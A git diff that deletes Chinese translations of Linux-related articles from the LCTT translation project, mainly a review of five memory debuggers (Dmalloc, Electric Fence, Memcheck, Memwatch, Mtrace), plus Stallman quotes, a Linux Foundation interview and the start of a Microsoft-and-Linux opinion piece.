-> 劳有所得,或寻求收入的最大化并没有什么错,只要不是不择手段。
-
-**关于 Chrome OS:**
-
-> Chrome OS 确实是 GNU/Linux 的操作系统。但是,它在发布时没有安装常用应用,并为安装他们设置了阻碍。
-
-**关于 Linux 用户:**
-
-> 许多的 GNU/Linux 用户并没有听过自由软件。他们并没有意识到,这个系统是因为道德理想才存在的,与此一起被忽视的还有所谓的“开源”。
-
-**关于 facebook 的隐私:**
-
-> 如果页面上有 “like” 按键,Facebook 就能知道谁访问了页面。即使不是 Facebook 的用户,也可以得到访问该页面电脑的 IP 地址。
-
-**关于编程:**
-
-> 编程不是科学,编程是手艺。
->
-> Lisp 和 C 语言是我的最爱。然自 1992 年以来高频的自由软件活动,确实反映了我编的太过匆忙。大概在 2008 年我便停止了编程开发。
->
-> C++ 设计的真糟糕、真丑陋。在 Emacs 上用他应该觉得羞愧。
-
-**关于钻研(hacking)和学习编程:**
-
-> 今时不同往日,大家再也不用走我的老路了,完全可以在实际的操作系统上提升自己。上世纪 80 年代,我常遇见计算机专业的毕业生,自出生以来没见过真正的程序。他们接触的到的只有小玩意和学校的作业,因为每一个程序都是商业机密。他们没有机会去写真正实用的特性,修复用户真正遭遇的问题。做这些事便是你应知晓的最好的提升方式。
->
-> 对于如 hacking 这般多样化的东西真的很难简单的下定义,不过在我看来诸如此类的行为都会有以下的这些共同点:嬉乐、智慧和探索。因此,hacking 意味着对可能的极限的探索,一颗向往快乐与智慧心。能带来快乐与智慧的行为就有 “hack 的价值” 。
-
-**关于浏览网页:**
-
-> 由于个人原因,我不会在我的电脑上浏览网页。(大部分时间处于没有网络连接的状态。)要浏览网页,我需要给守护进程发 mail,然后它会运行 wget 并把页面通过 mail 发还给我。这对我而言已经是最效率了,但那真的比实时慢太多了。
-
-**关于音乐共享:**
-
-> 朋友之间彼此分享音乐,绝不会希望因为系统的一句:禁止私下拷贝!而生分。
-
---------------------------------------------------------------------------------
-
-via: https://tlhp.cf/fsf-richard-stallman/
-
-作者:[Pavlo Rudyi][a]
-译者:[martin2011qi](https://github.com/martin2011qi)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://tlhp.cf/fsf-richard-stallman/
-[1]:http://www.gnu.org/
-[2]:http://www.fsf.org/
-[3]:https://www.fsf.org/about/
\ No newline at end of file
diff --git a/translated/talk/20151124 Review--5 memory debuggers for Linux coding.md b/translated/talk/20151124 Review--5 memory debuggers for Linux coding.md
deleted file mode 100644
index b49ba9e40a..0000000000
--- a/translated/talk/20151124 Review--5 memory debuggers for Linux coding.md
+++ /dev/null
@@ -1,299 +0,0 @@
-点评:Linux编程中五款内存调试器
-================================================================================
-![](http://images.techhive.com/images/article/2015/11/penguinadmin-2400px-100627186-primary.idge.jpg)
-Credit: [Moini][1]
-
-作为一个程序员,我知道我总在犯错误——事实是,怎么可能会不犯错的!程序员也是人啊。有的错误能在编码过程中及时发现,而有些却得等到软件测试才显露出来。然而,有一类错误并不能在这两个时期被排除,从而导致软件不能正常运行,甚至是提前中止。
-
-想到了吗?我说的就是内存相关的错误。手动调试这些错误不仅耗时,而且很难发现并纠正。值得一提的是,这种错误非常地常见,特别是在一些软件里,这些软件是用C/C++这类允许[手动管理内存][2]的语言编写的。
-
-幸运的是,现行有一些编程工具能够帮你找到软件程序中这些内存相关的错误。在这些工具集中,我评定了五款Linux可用的,流行、免费并且开源的内存调试器:Dmalloc、Electric Fence、 Memcheck、 Memwatch以及Mtrace。日常编码过程中我已经把这五个调试器用了个遍,所以这些点评是建立在我的实际体验之上的。
-
-### [Dmalloc][3] ###
-
-**开发者**:Gray Watson
-
-**点评版本**:5.5.2
-
-**Linux支持**:所有种类
-
-**许可**:知识共享署名-相同方式共享许可证3.0
-
-Dmalloc是Gray Watson开发的一款内存调试工具。它实现成库,封装了标准内存管理函数如**malloc(), calloc(), free()**等,使得程序员得以检测出有问题的代码。
-
-![cw dmalloc output](http://images.techhive.com/images/article/2015/11/cw_dmalloc-output-100627040-large.idge.png)
-Dmalloc
-
-如同工具的网页所列,这个调试器提供的特性包括内存泄漏跟踪、[重复释放(double free)][4]错误跟踪、以及[越界写入(fence-post write)][5]检测。其它特性包括文件/行号报告、普通统计记录。
-
-#### 更新内容 ####
-
-5.5.2版本是一个[bug修复发行版][6],同时修复了构建和安装的问题。
-
-#### 有何优点 ####
-
-Dmalloc最大的优点是可以进行任意配置。比如说,你可以配置以支持C++程序和多线程应用。Dmalloc还提供一个有用的功能:运行时可配置,这表示在Dmalloc执行时,可以轻易地使能或者禁能它提供的特性。
-
-你还可以配合[GNU Project Debugger (GDB)][7]来使用Dmalloc,只需要将dmalloc.gdb文件(位于Dmalloc源码包中的contrib子目录里)的内容添加到你的主目录中的.gdbinit文件里即可。
-
-另外一个优点让我对Dmalloc爱不释手的是它有大量的资料文献。前往官网的[Documentation标签][8],可以获取任何内容,有关于如何下载、安装、运行,怎样使用库,和Dmalloc所提供特性的细节描述,及其输入文件的解释。里面还有一个章节介绍了一般问题的解决方法。
-
-#### 注意事项 ####
-
-跟Mtrace一样,Dmalloc需要程序员改动他们的源代码。比如说你可以(必须的)添加头文件**dmalloc.h**,工具就能汇报产生问题的调用的文件或行号。这个功能非常有用,因为它节省了调试的时间。
-
-除此之外,还需要在编译你的程序时,把Dmalloc库(编译源码包时产生的)链接进去。
-
-然而,还有点更麻烦的事,需要设置一个环境变量,命名为**DMALLOC_OPTION**,以供工具在运行时配置内存调试特性,以及输出文件的路径。可以手动为该环境变量分配一个值,不过初学者可能会觉得这个过程有点困难,因为你想使能的Dmalloc特性是存在于这个值之中的——表示为各自的十六进制值的累加。[这里][9]有详细介绍。
-
-一个比较简单方法设置这个环境变量是使用[Dmalloc实用指令][10],这是专为这个目的设计的方法。
-
-#### 总结 ####
-
-Dmalloc真正的优势在于它的可配置选项。而且高度可移植,曾经成功移植到多种操作系统如AIX、BSD/OS、DG/UX、Free/Net/OpenBSD、GNU/Hurd、HPUX、Irix、Linux、MS-DOG、NeXT、OSF、SCO、Solaris、SunOS、Ultrix、Unixware甚至Unicos(运行在Cray T3E主机上)。虽然Dmalloc有很多东西需要学习,但是它所提供的特性值得为之付出。
-
-### [Electric Fence][15] ###
-
-**开发者**:Bruce Perens
-
-**点评版本**:2.2.3
-
-**Linux支持**:所有种类
-
-**许可**:GNU 通用公共许可证 (第二版)
-
-Electric Fence是Bruce Perens开发的一款内存调试工具,它以库的形式实现,你的程序需要链接它。Electric Fence能检测出[栈][11]内存溢出和访问已经释放的内存。
-
-![cw electric fence output](http://images.techhive.com/images/article/2015/11/cw_electric-fence-output-100627041-large.idge.png)
-Electric Fence
-
-顾名思义,Electric Fence在每个申请的缓存边界建立了fence(防护),任何非法内存访问都会导致[段错误][12]。这个调试工具同时支持C和C++编程。
-
-
-#### 更新内容 ####
-
-2.2.3版本修复了工具的构建系统,使得-fno-builtin-malloc选项能真正传给[GNU Compiler Collection (GCC)][13]。
-
-#### 有何优点 ####
-
-我喜欢Electric Fence首要的一点是(Memwatch、Dmalloc和Mtrace所不具有的),这个调试工具不需要你的源码做任何的改动,你只需要在编译的时候把它的库链接进你的程序即可。
-
-其次,Electric Fence实现一个方法,确认导致越界访问(a bounds violation)的第一个指令就是引起段错误的原因。这比在后面再发现问题要好多了。
-
-不管是否有检测出错误,Electric Fence经常会在输出产生版权信息。这一点非常有用,由此可以确定你所运行的程序已经启用了Electric Fence。
-
-#### 注意事项 ####
-
-另一方面,我对Electric Fence真正念念不忘的是它检测内存泄漏的能力。内存泄漏是C/C++软件最常见也是最难隐秘的问题之一。不过,Electric Fence不能检测出堆内存溢出,而且也不是线程安全的。
-
-基于Electric Fence会在用户分配内存区的前后分配禁止访问的虚拟内存页,如果你过多的进行动态内存分配,将会导致你的程序消耗大量的额外内存。
-
-Electric Fence还有一个局限是不能明确指出错误代码所在的行号。它所能做只是在监测到内存相关错误时产生段错误。想要定位行号,需要借助[The Gnu Project Debugger (GDB)][14]这样的调试工具来调试你启用了Electric Fence的程序。
-
-最后一点,Electric Fence虽然能检测出大部分的缓冲区溢出,有一个例外是,如果所申请的缓冲区大小不是系统字长的倍数,这时候溢出(即使只有几个字节)就不能被检测出来。
-
-#### 总结 ####
-
-尽管有那么多的局限,但是Electric Fence的优点却在于它的易用性。程序只要链接工具一次,Electric Fence就可以在监测出内存相关问题的时候报警。不过,如同前面所说,Electric Fence需要配合像GDB这样的源码调试器使用。
-
-
-### [Memcheck][16] ###
-
-**开发者**:[Valgrind开发团队][17]
-
-**点评版本**:3.10.1
-
-**Linux支持**:所有种类
-
-**许可**:通用公共许可证
-
-[Valgrind][18]是一个提供好几款调试和Linux程序性能分析工具的套件。虽然Valgrind和编写语言各不相同(有Java、Perl、Python、Assembly code、ortran、Ada等等)的程序配合工作,但是它所提供的工具大部分都意在支持C/C++所编写的程序。
-
-Memcheck作为内存错误检测器,是一款最受欢迎的Memcheck工具。它能够检测出诸多问题诸如内存泄漏、无效的内存访问、未定义变量的使用以及栈内存分配和释放相关的问题等。
-
-#### 更新内容 ####
-
-工具套件(3.10.1)的[发行版][19]是一个副版本,主要修复了3.10.0版本发现的bug。除此之外,从主版本backport一些包,修复了缺失的AArch64 ARMv8指令和系统调用。
-
-#### 有何优点 ####
-
-同其它所有Valgrind工具一样,Memcheck也是基本的命令行实用程序。它的操作非常简单:通常我们会使用诸如prog arg1 arg2格式的命令来运行程序,而Memcheck只要求你多加几个值即可,就像valgrind --leak-check=full prog arg1 arg2。
-
-![cw memcheck output](http://images.techhive.com/images/article/2015/11/cw_memcheck-output-100627037-large.idge.png)
-Memcheck
-
-(注意:因为Memcheck是Valgrind的默认工具所以无需提及Memcheck。但是,需要在编译程序之初带上-g参数选项,这一步会添加调试信息,使得Memcheck的错误信息会包含正确的行号。)
-
-我真正倾心于Memcheck的是它提供了很多命令行选项(如上所述的--leak-check选项),如此不仅能控制工具运转还可以控制它的输出。
-
-举个例子,可以开启--track-origins选项,以查看程序源码中未初始化的数据。可以开启--show-mismatched-frees选项让Memcheck匹配内存的分配和释放技术。对于C语言所写的代码,Memcheck会确保只能使用free()函数来释放内存,malloc()函数来申请内存。而对C++所写的源码,Memcheck会检查是否使用了delete或delete[]操作符来释放内存,以及new或者new[]来申请内存。
-
-Memcheck最好的特点,尤其是对于初学者来说的,是它会给用户建议使用那个命令行选项能让输出更加有意义。比如说,如果你不使用基本的--leak-check选项,Memcheck会在输出时建议“使用--leak-check=full重新运行,查看更多泄漏内存细节”。如果程序有未初始化的变量,Memcheck会产生信息“使用--track-origins=yes,查看未初始化变量的定位”。
-
-Memcheck另外一个有用的特性是它可以[创建抑制文件(suppression files)][20],由此可以忽略特定不能修正的错误,这样Memcheck运行时就不会每次都报警了。值得一提的是,Memcheck会去读取默认抑制文件来忽略系统库(比如C库)中的报错,这些错误在系统创建之前就已经存在了。可以选择创建一个新的抑制文件,或是编辑现有的(通常是/usr/lib/valgrind/default.supp)。
-
-Memcheck还有高级功能,比如可以使用[定制内存分配器][22]来[检测内存错误][21]。除此之外,Memcheck提供[监控命令][23],当用到Valgrind的内置gdbserver,以及[客户端请求][24]机制(不仅能把程序的行为告知Memcheck,还可以进行查询)时可以使用。
-
-#### 注意事项 ####
-
-毫无疑问,Memcheck可以节省很多调试时间以及省去很多麻烦。但是它使用了很多内存,导致程序执行变慢([由资料可知][25],大概花上20至30倍时间)。
-
-除此之外,Memcheck还有其它局限。根据用户评论,Memcheck明显不是[线程安全][26]的;它不能检测出 [静态缓冲区溢出][27];还有就是,一些Linux程序如[GNU Emacs][28],目前还不能使用Memcheck。
-
-如果有兴趣,可以在[这里][29]查看Valgrind详尽的局限性说明。
-
-#### 总结 ####
-
-无论是对于初学者还是那些需要高级特性的人来说,Memcheck都是一款便捷的内存调试工具。如果你仅需要基本调试和错误核查,Memcheck会非常容易上手。而当你想要使用像抑制文件或者监控指令这样的特性,就需要花一些功夫学习了。
-
-虽然罗列了大量的局限性,但是Valgrind(包括Memcheck)在它的网站上声称全球有[成千上万程序员][30]使用了此工具。开发团队称收到来自超过30个国家的用户反馈,而这些用户的工程代码有的高达2.5千万行。
-
-### [Memwatch][31] ###
-
-**开发者**:Johan Lindh
-
-**点评版本**:2.71
-
-**Linux支持**:所有种类
-
-**许可**:GNU通用公共许可证
-
-Memwatch是由Johan Lindh开发的内存调试工具,虽然它主要扮演内存泄漏检测器的角色,但是它也具有检测其它如[重复释放跟踪和内存错误释放][32]、缓冲区溢出和下溢、[野指针][33]写入等等内存相关问题的能力(根据网页介绍所知)。
-
-Memwatch支持用C语言所编写的程序。可以在C++程序中使用它,但是这种做法并不提倡(由Memwatch源码包随附的Q&A文件中可知)。
-
-#### 更新内容 ####
-
-这个版本添加了ULONG_LONG_MAX以区分32位和64位程序。
-
-#### 有何优点 ####
-
-跟Dmalloc一样,Memwatch也有优秀的文献资料。参考USING文件,可以学习如何使用Memwatch,可以了解Memwatch是如何初始化、如何清理以及如何进行I/O操作的,等等不一而足。还有一个FAQ文件,旨在帮助用户解决使用过程遇到的一般问题。最后还有一个test.c文件提供工作案例参考。
-
-![cw memwatch output](http://images.techhive.com/images/article/2015/11/cw_memwatch_output-100627038-large.idge.png)
-Memwatch
-
-不同于Mtrace,Memwatch的输出产生的日志文件(通常是memwatch.log)是人类可阅读格式。而且,Memwatch每次运行时总会拼接内存调试输出到此文件末尾,而不是进行覆盖(译改)。如此便可在需要之时,轻松查看之前的输出信息。
-
-同样值得一提的是当你执行了启用Memwatch的程序,Memwatch会在[标准输出][34]中产生一个单行输出,告知发现了错误,然后你可以在日志文件中查看输出细节。如果没有产生错误信息,就可以确保日志文件不会写入任何错误,多次运行的话能实际节省时间。
-
-另一个我喜欢的优点是Memwatch同样在源码中提供一个方法,你可以据此获取Memwatch的输出信息,然后任由你进行处理(参考Memwatch源码中的mwSetOutFunc()函数获取更多有关的信息)。
-
-#### 注意事项 ####
-
-跟Mtrace和Dmalloc一样,Memwatch也需要你往你的源文件里增加代码:你需要把memwatch.h这个头文件包含进你的代码。而且,编译程序的时候,你需要连同memwatch.c一块编译;或者你可以把已经编译好的目标模块包含起来,然后在命令行定义MEMWATCH和MW_STDIO变量。不用说,想要在输出中定位行号,-g编译器选项也少不了。
-
-还有一些没有具备的特性。比如Memwatch不能检测出往一块已经被释放的内存写入操作,或是在分配的内存块之外的读取操作。而且,Memwatch也不是线程安全的。还有一点,正如我在开始时指出,在C++程序上运行Memwatch的结果是不能预料的。
-
-#### 总结 ####
-
-Memcheck可以检测很多内存相关的问题,在处理C程序时是非常便捷的调试工具。因为源码小巧,所以可以从中了解Memcheck如何运转,有需要的话可以调试它,甚至可以根据自身需求扩展升级它的功能。
-
-### [Mtrace][35] ###
-
-**开发者**: Roland McGrath and Ulrich Drepper
-
-**点评版本**: 2.21
-
-**Linux支持**:所有种类
-
-**许可**:GNU通用公共许可证
-
-Mtrace是[GNU C库][36]中的一款内存调试工具,同时支持Linux C和C++程序,检测由malloc()和free()函数的不对等调用所引起的内存泄漏问题。
-
-![cw mtrace output](http://images.techhive.com/images/article/2015/11/cw_mtrace-output-100627039-large.idge.png)
-Mtrace
-
-Mtrace实现为对mtrace()函数的调用,跟踪程序中所有malloc/free调用,在用户指定的文件中记录相关信息。文件以一种机器可读的格式记录数据,所以有一个Perl脚本(同样命名为mtrace)用来把文件转换并展示为人类可读格式。
-
-#### 更新内容 ####
-
-[Mtrace源码][37]和[Perl文件][38]同GNU C库(2.21版本)一起释出,除了更新版权日期,其它别无改动。
-
-#### 有何优点 ####
-
-Mtrace最优秀的特点是非常简单易学。你只需要了解在你的源码中如何以及何处添加mtrace()及其对立的muntrace()函数,还有如何使用Mtrace的Perl脚本。后者非常简单,只需要运行指令mtrace (例子见开头截图最后一条指令)。
-
-Mtrace另外一个优点是它的可收缩性,体现在,不仅可以使用它来调试完整的程序,还可以使用它来检测程序中独立模块的内存泄漏。只需在每个模块里调用mtrace()和muntrace()即可。
-
-最后一点,因为Mtrace会在mtace()(在源码中添加的函数)执行时被触发,因此可以很灵活地[使用信号][39]动态地(在程序执行周期内)使能Mtrace。
-
-#### 注意事项 ####
-
-因为mtrace()和mauntrace()函数(在mcheck.h文件中声明,所以必须在源码中包含此头文件)的调用是Mtrace运行(mauntrace()函数并非[总是必要][40])的根本,因此Mtrace要求程序员至少改动源码一次。
-
-了解需要在编译程序的时候带上-g选项([GCC][41]和[G++][42]编译器均由提供),才能使调试工具在输出展示正确的行号。除此之外,有些程序(取决于源码体积有多大)可能会花很长时间进行编译。最后,带-g选项编译会增加了可执行文件的内存(因为提供了额外的调试信息),因此记得程序需要在测试结束,不带-g选项重新进行编译。
-
-使用Mtrace,你需要掌握Linux环境变量的基本知识,因为在程序执行之前,需要把用户指定文件(mtrace()函数用以记载全部信息)的路径设置为环境变量MALLOC_TRACE的值。
-
-Mtrace在检测内存泄漏和尝试释放未经过分配的内存方面存在局限。它不能检测其它内存相关问题如非法内存访问、使用未初始化内存。而且,[有人抱怨][43]Mtrace不是[线程安全][44]的。
-
-### 总结 ###
-
-不言自明,我在此讨论的每款内存调试器都有其优点和局限。所以,哪一款适合你取决于你所需要的特性,虽然有时候容易安装和使用也是一个决定因素。
-
-要想捕获软件程序中的内存泄漏,Mtrace最适合不过了。它还可以节省时间。由于Linux系统已经预装了此工具,对于不能联网或者不可以下载第三方调试调试工具的情况,Mtrace也是极有助益的。
-
-另一方面,相比Mtrace,,Dmalloc不仅能检测更多错误类型,还你呢个提供更多特性,比如运行时可配置、GDB集成。而且,Dmalloc不像这里所说的其它工具,它是线程安全的。更不用说它的详细资料了,这让Dmalloc成为初学者的理想选择。
-
-虽然Memwatch的资料比Dmalloc的更加丰富,而且还能检测更多的错误种类,但是你只能在C语言写就的软件程序上使用它。一个让Memwatch脱颖而出的特性是它允许在你的程序源码中处理它的输出,这对于想要定制输出格式来说是非常有用的。
-
-如果改动程序源码非你所愿,那么使用Electric Fence吧。不过,请记住,Electric Fence只能检测两种错误类型,而此二者均非内存泄漏。还有就是,需要了解GDB基础以最大程序发挥这款内存调试工具的作用。
-
-Memcheck可能是这当中综合性最好的了。相比这里所说其它工具,它检测更多的错误类型,提供更多的特性,而且不需要你的源码做任何改动。但请注意,基本功能并不难上手,但是想要使用它的高级特性,就必须学习相关的专业知识了。
-
---------------------------------------------------------------------------------
-
-via: http://www.computerworld.com/article/3003957/linux/review-5-memory-debuggers-for-linux-coding.html
-
-作者:[Himanshu Arora][a]
-译者:[译者ID](https://github.com/soooogreen)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.computerworld.com/author/Himanshu-Arora/
-[1]:https://openclipart.org/detail/132427/penguin-admin
-[2]:https://en.wikipedia.org/wiki/Manual_memory_management
-[3]:http://dmalloc.com/
-[4]:https://www.owasp.org/index.php/Double_Free
-[5]:https://stuff.mit.edu/afs/sipb/project/gnucash-test/src/dmalloc-4.8.2/dmalloc.html#Fence-Post%20Overruns
-[6]:http://dmalloc.com/releases/notes/dmalloc-5.5.2.html
-[7]:http://www.gnu.org/software/gdb/
-[8]:http://dmalloc.com/docs/
-[9]:http://dmalloc.com/docs/latest/online/dmalloc_26.html#SEC32
-[10]:http://dmalloc.com/docs/latest/online/dmalloc_23.html#SEC29
-[11]:https://en.wikipedia.org/wiki/Memory_management#Dynamic_memory_allocation
-[12]:https://en.wikipedia.org/wiki/Segmentation_fault
-[13]:https://en.wikipedia.org/wiki/GNU_Compiler_Collection
-[14]:http://www.gnu.org/software/gdb/
-[15]:https://launchpad.net/ubuntu/+source/electric-fence/2.2.3
-[16]:http://valgrind.org/docs/manual/mc-manual.html
-[17]:http://valgrind.org/info/developers.html
-[18]:http://valgrind.org/
-[19]:http://valgrind.org/docs/manual/dist.news.html
-[20]:http://valgrind.org/docs/manual/mc-manual.html#mc-manual.suppfiles
-[21]:http://valgrind.org/docs/manual/mc-manual.html#mc-manual.mempools
-[22]:http://stackoverflow.com/questions/4642671/c-memory-allocators
-[23]:http://valgrind.org/docs/manual/mc-manual.html#mc-manual.monitor-commands
-[24]:http://valgrind.org/docs/manual/mc-manual.html#mc-manual.clientreqs
-[25]:http://valgrind.org/docs/manual/valgrind_manual.pdf
-[26]:http://sourceforge.net/p/valgrind/mailman/message/30292453/
-[27]:https://msdn.microsoft.com/en-us/library/ee798431%28v=cs.20%29.aspx
-[28]:http://www.computerworld.com/article/2484425/linux/5-free-linux-text-editors-for-programming-and-word-processing.html?nsdr=true&page=2
-[29]:http://valgrind.org/docs/manual/manual-core.html#manual-core.limits
-[30]:http://valgrind.org/info/
-[31]:http://www.linkdata.se/sourcecode/memwatch/
-[32]:http://www.cecalc.ula.ve/documentacion/tutoriales/WorkshopDebugger/007-2579-007/sgi_html/ch09.html
-[33]:http://c2.com/cgi/wiki?WildPointer
-[34]:https://en.wikipedia.org/wiki/Standard_streams#Standard_output_.28stdout.29
-[35]:http://www.gnu.org/software/libc/manual/html_node/Tracing-malloc.html
-[36]:https://www.gnu.org/software/libc/
-[37]:https://sourceware.org/git/?p=glibc.git;a=history;f=malloc/mtrace.c;h=df10128b872b4adc4086cf74e5d965c1c11d35d2;hb=HEAD
-[38]:https://sourceware.org/git/?p=glibc.git;a=history;f=malloc/mtrace.pl;h=0737890510e9837f26ebee2ba36c9058affb0bf1;hb=HEAD
-[39]:http://webcache.googleusercontent.com/search?q=cache:s6ywlLtkSqQJ:www.gnu.org/s/libc/manual/html_node/Tips-for-the-Memory-Debugger.html+&cd=1&hl=en&ct=clnk&gl=in&client=Ubuntu
-[40]:http://www.gnu.org/software/libc/manual/html_node/Using-the-Memory-Debugger.html#Using-the-Memory-Debugger
-[41]:http://linux.die.net/man/1/gcc
-[42]:http://linux.die.net/man/1/g++
-[43]:https://sourceware.org/ml/libc-help/2014-05/msg00008.html
-[44]:https://en.wikipedia.org/wiki/Thread_safety
diff --git a/translated/talk/20151126 Linux Foundation Explains a 'World without Linux' and Open Source.md b/translated/talk/20151126 Linux Foundation Explains a 'World without Linux' and Open Source.md
deleted file mode 100644
index 3f0170de0a..0000000000
--- a/translated/talk/20151126 Linux Foundation Explains a 'World without Linux' and Open Source.md
+++ /dev/null
@@ -1,52 +0,0 @@
-没有 Linux 和开源软件的世界会变得怎么样 —— 听听来自 Linux 基金会的解释
-================================================================================
-> Linux 基金会针最近对人们关于 “没有 Linux 的世界” 系列短片提出的问题做了回应:包括没有 Linux 和其他的开源软件的因特网会变得怎么样等问题。
-
-![](http://thevarguy.com/site-files/thevarguy.com/files/imagecache/medium_img/uploads/2015/11/hey_22.png)
-
-假如 Linux —— 一个开源的操作系统内核 —— 不曾出现过,我们现在的世界是否会是另一番景象。会不会没有了因特网,或者没有了电影?这些都是 [Linux 基金会][1] 正在连续播出的 “[没有 Linux 的世界][2]” 系列短片的观众提出来的问题。
-
-假如你错过了观看这些短片也不要紧,“没有 Linux 的世界” 系列短片是一个古怪的短片集合,里边描述了没有了 Linux (或者说没有开源软件)的世界发生的事情。这些短片强调了 Linux 在 [电影制作][3] 以及 [服务于因特网][4] 中充当的角色。
-
-为了提供该系列短片的一些主张、方向和隐藏元素,Linux 基金会副主席 Jennifer Cloer 最近在 The VAR Guy 上回应了关于该短片的一些问题。以下是她的原话解答。
-
-### 最新一集短片 —— Sam 和 Annie 一起看电影。假如没有 Linux,我们现在的荧屏是不是也和短片中的一样? ###
-
-在 #4 剧情中,我们恶搞了一下电影 “Avatar”。不管你喜欢还是讨厌,现实中的 “Avatar” 在荧屏上的效果还是让人产生记忆深刻的。在没有 Linux 的世界中,电影的效果就变得非常恐怖,但是我们并不介意它,因为那已经是最好的了。但实际上,“Avatar” 是使用了 Linux 来进行效果制作的。Weta 数码使用了当时世界上最大的 Linux 集群来给电影做效果渲染和 3D 建模。据报道,指环王(Lord of the Rings)、神奇四侠(Fantastic Four)和金刚(King Kong)等电影都用到了 Linux。我希望该短片能引起电影制作工作者的关注,还有很多我们不知道的用到 Linux 来制作的电影。(译者注:这句应该是强度 Linux 在电影制作中的重要应用,可能翻译的不是很好。that work应该指的电影制作,只是直译感觉有点怪,这暂时没想到怎么译的最好。原话为:We hope this episode can bring attention to that work, which hasn't been widely reported.)
-
-### 很多人对短片的原始剧情进行了批判,其中包括没有 Linux 将没有因特网。你对此持什么样的看法? ###
-
-我们很喜欢人们从短片刚上映就进行激烈的辩论。该短片上映当天就超过了 100,000 的观众,这引起了人们对 Linux 在社会中扮演的角色以及全球的社区贡献者和维护者的关注。当然了,没有 Linux 的话,因特网也是会出现的,只是不会像当前我们所熟知的互联网那么成熟而已。每一个短片都对 Linux 在我们每天生活中扮演的角色进行了大胆且有趣的描述。我们希望,这些短片能够把关于 Linux 的故事推广到全世界的人的心里去。
-
-### 为什么 Sam 和 Annie 的那只猫叫做 String? ###
-
-该短片系列中没有一处剧情是偶然的。仔细的观看话,你就会发现其中关于 Linux 和极客们的各种玩笑。小猫 String 是我们的 Linux.com 主编 Libby Clark 以弦理论(string theory)亲自来命名的。在物理学里,弦理论(string theory)是一个理论框架,它用一个叫做弦(String)的一维对象替换了粒子物理学中粒子状粒子。弦理论(string theory)描述了这些弦(String)如何在空间传播以及相互影响。就像 Sam、Annie 和 String 在那个没有 Linux 的世界里的关系那样。
-
-### 我们期待已久的下两集是什么样的,特别是,最后那集什么时候上映? ###
-
-在 #5 短片中,我们将到太空并体验一下没有 Linux 的世界对太空探索的影响。这就像是一场疯狂的骑行。在短片的最后,我们最终还是会见到没有 Linux 的世界里的 Linus。贯穿整个短片系列,里边已经给出关于结局的线索,我在这就不能给太多提示了,因为还有好多人在找线索比赛中继续寻找着。并且我也不能给你们说出关于结局短片的上映日期。你们要自己跟进 #WorldWithoutLinux 主题帖来获取跟多信息。
-
-### 你可给一些关于 #4 短片相关线索的提示吗? ###
-
-在该短片中有另外一个关于免费汉堡餐厅(Free Burger Restaurant)的线索。在那个没有 Linux 的世界里,Linux 最后还是以一种很隐秘的方式出现了,可以说,就像是以另一种语言来解读 Linux。当然,这只是为了好玩,String 也是另外一个模样。
-
-### 那么,该系列短片达到你所想要的效果了吗? ###
-
-是的,达到了。我们很高兴看到人们分享并参与到这些故事中去。
-我们希望向那些可能不知道 Linux 的人传达更多关于 Linux 的故事并了解 Linux 在当今世界中是无处不在的。全部的短片就是为了把这些关于 Linux 的真相推广给大家,并感谢那些全球性社区的开发者和公司对 Linux 的支持,Linux 使得一切成为可能。
-
---------------------------------------------------------------------------------
-
-via: http://thevarguy.com/open-source-application-software-companies/linux-foundation-explains-world-without-linux-and-open-so
-
-作者:[Christopher Tozzi][a]
-译者:[GHLandy](https://github.com/GHLandy)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://thevarguy.com/author/christopher-tozzi
-[1]:http://linuxfoundation.org/
-[2]:http://www.linuxfoundation.org/world-without-linux
-[3]:http://thevarguy.com/open-source-application-software-companies/new-linux-foundation-video-highlights-role-open-source-3d
-[4]:http://thevarguy.com/open-source-application-software-companies/100715/would-internet-exist-without-linux-yes-without-open-sourc
diff --git a/translated/talk/20151126 Microsoft and Linux--True Romance or Toxic Love.md b/translated/talk/20151126 Microsoft and Linux--True Romance or Toxic Love.md
deleted file mode 100644
index d16ed99114..0000000000
--- a/translated/talk/20151126 Microsoft and Linux--True Romance or Toxic Love.md
+++ /dev/null
@@ -1,77 +0,0 @@
-微软和 Linux :真正的浪漫还是有毒的爱情?
-================================================================================
-时不时的我们会读到一个能让你喝咖啡呛到或者把热拿铁喷到你显示器上的新闻故事。微软最近宣布的对 Linux 的钟爱就是这样一个鲜明的例子。
-
-从常识来讲,微软和自由开源软件(FOSS)运动就是恒久的敌人。在很多人眼里,微软体现了过分的贪婪,而这正为自由开源软件运动(FOSS)所拒绝。另外,之前微软就已经给自由开源软件社区贴上了"一伙强盗"的标签。
-
-我们能够理解为什么微软一直以来都害怕免费的操作系统。免费操作系统结合挑战微软核心产品线的开源应用时,就威胁到了微软在台式机和笔记本电脑市场的控制地位。
-
-尽管微软有对在台式机主导地位的担忧,在网络服务器市场 Linux 却有着最高的影响力。今天,大多数的服务器都是 Linux 系统。包括世界上最繁忙的站点服务器。对微软来说,看到这么多没有被声明的许可证收入一定是非常痛苦的。
-
-掌上设备是微软输给免费软件的另一个领域。曾几何时,微软的 Windows CE 和 Pocket PC 操作系统走在移动计算的前沿。Windows PDA 设备是最闪亮的和豪华的产品。但是这一切在苹果公司发布了iphone之后都结束了。从那时起,安卓已经开始进入公众视野,Windows的移动产品开始被忽略被遗忘。而安卓平台是建立在免费开源的组件的基础上的。
-
-由于安卓平台的开放性,安卓的市场份额在迅速扩大。不像 IOS,任何一个手机制造商都可以发布安卓手机。也不像Windows手机,安卓没有许可费用。这对消费者来说是件好事。这也导致了许多强大却又价格低廉的手机制造商在世界各地涌现。这非常明确的证明了自由开源软件(FOSS)的价值。
-
-在服务器和移动计算的角逐中失利对微软来说是非常惨重的损失。考虑一下服务器和移动计算这两个加起来所占有的市场大小,台式机市场似乎是死水一潭。没有人喜欢失败,尤其是涉及到金钱。并且,微软确实有许多正在慢慢失去。你可能期望着微软自尝苦果。在过去,确实如此。
-
-微软使用了各种可以支配的手段来对 Linux 和自由开源软件(FOSS)进行反击,从宣传到专利威胁。尽管这种攻击确实减慢了适配 Linux 的步伐,但却从来没有让 Linux 的脚步停下。
-
